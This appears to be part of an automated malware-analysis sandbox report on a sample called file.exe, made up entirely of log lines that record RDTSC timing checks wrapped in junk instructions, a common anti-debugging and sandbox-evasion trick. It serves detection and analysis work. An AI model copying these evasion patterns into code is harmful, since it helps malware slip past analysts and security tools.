Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194E15 second address: 1194E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F528105F326h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11953AA second address: 11953B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11953B0 second address: 11953B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195613 second address: 1195617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195617 second address: 119561D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119561D second address: 1195638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007F528074EBD6h 0x00000012 popad 0x00000013 jl 00007F528074EBE2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195E76 second address: 1195E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195E7A second address: 1195EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F528074EBE7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195EB2 second address: 1195EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F528105F32Bh 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1196439 second address: 119643D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119B3AE second address: 119B3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119B3B4 second address: 119B3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E342 second address: 119E347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E78D second address: 119E796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E796 second address: 119E7B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F331h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F528105F33Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119EBD3 second address: 119EBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119EBDD second address: 119EC12 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F528105F32Eh 0x00000012 push esi 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F528105F331h 0x0000001a pop esi 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119ED2A second address: 119ED45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F528074EBE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119ED45 second address: 119ED4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119EE8D second address: 119EEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F528074EBE0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119EEA6 second address: 119EECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F528105F326h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A75BA second address: 11A75C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A75C0 second address: 11A75C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A75C9 second address: 11A75CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A75CF second address: 11A75D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A75D4 second address: 11A75DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A79BF second address: 11A79C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A79C3 second address: 11A79ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F528074EBE1h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jc 00007F528074EBD6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A79ED second address: 11A7A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F332h 0x00000007 jc 00007F528105F326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A7F7C second address: 11A7F9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F528074EBE5h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A7F9D second address: 11A7FA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A7FA2 second address: 11A7FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jc 00007F528074EBD6h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F528074EBE9h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 jnp 00007F528074EBE2h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 jnc 00007F528074EBD6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E704E second address: 10E706A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F338h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A826C second address: 11A8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9149 second address: 11A9157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F528105F326h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9157 second address: 11A9182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F528074EBD6h 0x00000011 pop edi 0x00000012 popad 0x00000013 jg 00007F528074EBF6h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F528074EBDEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9182 second address: 11A9186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9186 second address: 11A918A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFB2D second address: 11AFB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFB36 second address: 11AFB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFB40 second address: 11AFB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF54E second address: 11AF554 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF554 second address: 11AF55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF55D second address: 11AF563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF563 second address: 11AF578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F528105F326h 0x0000000c popad 0x0000000d jc 00007F528105F33Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF6E9 second address: 11AF6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF6F4 second address: 11AF6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF86D second address: 11AF878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F528074EBD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF878 second address: 11AF88B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F528105F32Eh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0446 second address: 11C0456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBDAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0456 second address: 11C0465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F528105F32Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C7B0E second address: 11C7B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C7B14 second address: 11C7B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6DFE second address: 11D6E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6E16 second address: 11D6E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D74BD second address: 11D74FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F528074EBDBh 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jbe 00007F528074EBD6h 0x00000014 je 00007F528074EBD6h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F528074EBE9h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D74FA second address: 11D74FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D74FF second address: 11D751B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F528074EBE0h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D751B second address: 11D7521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D7641 second address: 11D7646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D7646 second address: 11D7652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F528105F326h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D7652 second address: 11D766A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F528074EBD6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D824F second address: 11D8258 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8258 second address: 11D8280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE1h 0x00000009 jmp 00007F528074EBDFh 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8280 second address: 11D82AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F528105F326h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e jo 00007F528105F326h 0x00000014 pop ebx 0x00000015 jmp 00007F528105F331h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DCA44 second address: 11DCA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E6A3C second address: 11E6A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F528105F326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E6A4E second address: 11E6A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F77C6 second address: 11F77CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12115E5 second address: 12115FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE0h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211760 second address: 121176A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F528105F32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12119DC second address: 12119E9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12119E9 second address: 12119EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211E66 second address: 1211E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211E6C second address: 1211E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F32Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211E7E second address: 1211E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211E86 second address: 1211EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F528105F326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F528105F326h 0x00000014 jnc 00007F528105F326h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12139E7 second address: 12139EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1216466 second address: 1216475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1216475 second address: 121647A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1217BEB second address: 1217BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1217BF1 second address: 1217C21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F528074EBE4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219A4B second address: 1219A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219A57 second address: 1219A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F528074EBD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219A63 second address: 1219A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219A68 second address: 1219A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219A83 second address: 1219A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219566 second address: 121956A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121956A second address: 1219573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219573 second address: 1219582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B4DE second address: 121B4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B902A5 second address: 4B902CC instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F528074EBE4h 0x0000000c movzx esi, dx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B902CC second address: 4B902D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B902D2 second address: 4B90338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F528074EBDCh 0x00000011 sub si, 6B48h 0x00000016 jmp 00007F528074EBDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F528074EBE8h 0x00000022 add ah, FFFFFFA8h 0x00000025 jmp 00007F528074EBDBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90338 second address: 4B9033C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9033C second address: 4B90340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90340 second address: 4B90346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90346 second address: 4B9034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
